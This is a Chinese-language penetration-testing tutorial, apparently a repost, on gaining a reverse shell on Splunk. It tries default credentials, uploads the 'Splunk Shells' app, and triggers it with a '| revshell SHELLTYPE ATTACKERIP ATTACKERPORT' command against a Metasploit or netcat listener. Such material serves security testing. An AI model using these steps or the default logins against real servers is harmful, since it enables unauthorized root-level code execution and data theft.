在Splunk上安装自定义应用反弹Shell的方法

其实,当你点进来时,你已经输给小编了,小编肯定有某种神奇的魔力,把你勾引了进来,请给小编一个继续勾引你的机会,麻烦你点点关注和评论,小编也会记在心里呢。

每次测试时我都会碰到

Splunk

。Splunk是一个用于搜索,分析和可视化数据的软件平台。通常,Splunk中都会包含着各种数据,其中一些可能是较为敏感的数据。因此,对于渗透测试人员而言它的价值不言而喻。

想要获得对Splunk的访问权限,可以通过猜密码或重用之前获取到的密码尝试登录。曾经,我有过使用“

admin

:

admin

”或“

admin

:

changeme

”登录进入管理控制台的情况。

Splunk app

有一个技巧我相信很多人都不知道,就是使用Splunk app来执行

python

代码。TBG Security团队开发了一款可用于渗透测试的Splunk app。该应用早在2017年就已经推出。尽管如此,我觉得还是很少有人知道这个工具,我觉得它应该受到更多人的关注。

工具的使用非常简单。首先,你只需从Splunk Shells GitHub页面下载其最新版本。

登录Splunk管理控制台后,依次单击“App”栏和“

Manage

Apps

”。

进入Apps

面板

后,单击“Install app from

file

”。

单击browse按钮并上传tar.gz文件。

应用成功上传后,必须重启Splunk。重启后登录Splunk,并返回到“Apps”界面。单击permissions,当你看到“Sharing”选项时,单击“All

Apps

单选按钮

安装app后,最后要做的就是获取shell。这里会有一些选项,我选择的是通过Metasploit创建的标准反向shell。

MSF handler(或

netcat

listener

)启动并运行后,键入以下命令触发app:

| revshell SHELLTYPE ATTACKERIP ATTACKERPORT

这将立即执行app,并获取到一个反向shell。

以上测试是在Splunk 7.0上进行的,一切都非常的顺利!

Splunk

通常以root身份运行,这为攻击者提供了枚举主机其他信息的机会,而不仅仅是局限在数据库范围。

非常感谢各位看官能在百忙之中阅读小编的文章,您们的阅读和评论是小编继续坚持创作的动力。你们的每一个评论,小编都会去非常认真的去阅读,你们提出的宝贵意见我也会虚心接受,争取每天都为大家带来更多的优质文章。让大家不但可以增长见识,还可以有个好的心情。希望您能喜欢小编的文章!

  • 发表于:
  • 原文链接:https://kuaibao.qq.com/s/20181103A1O6A900?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券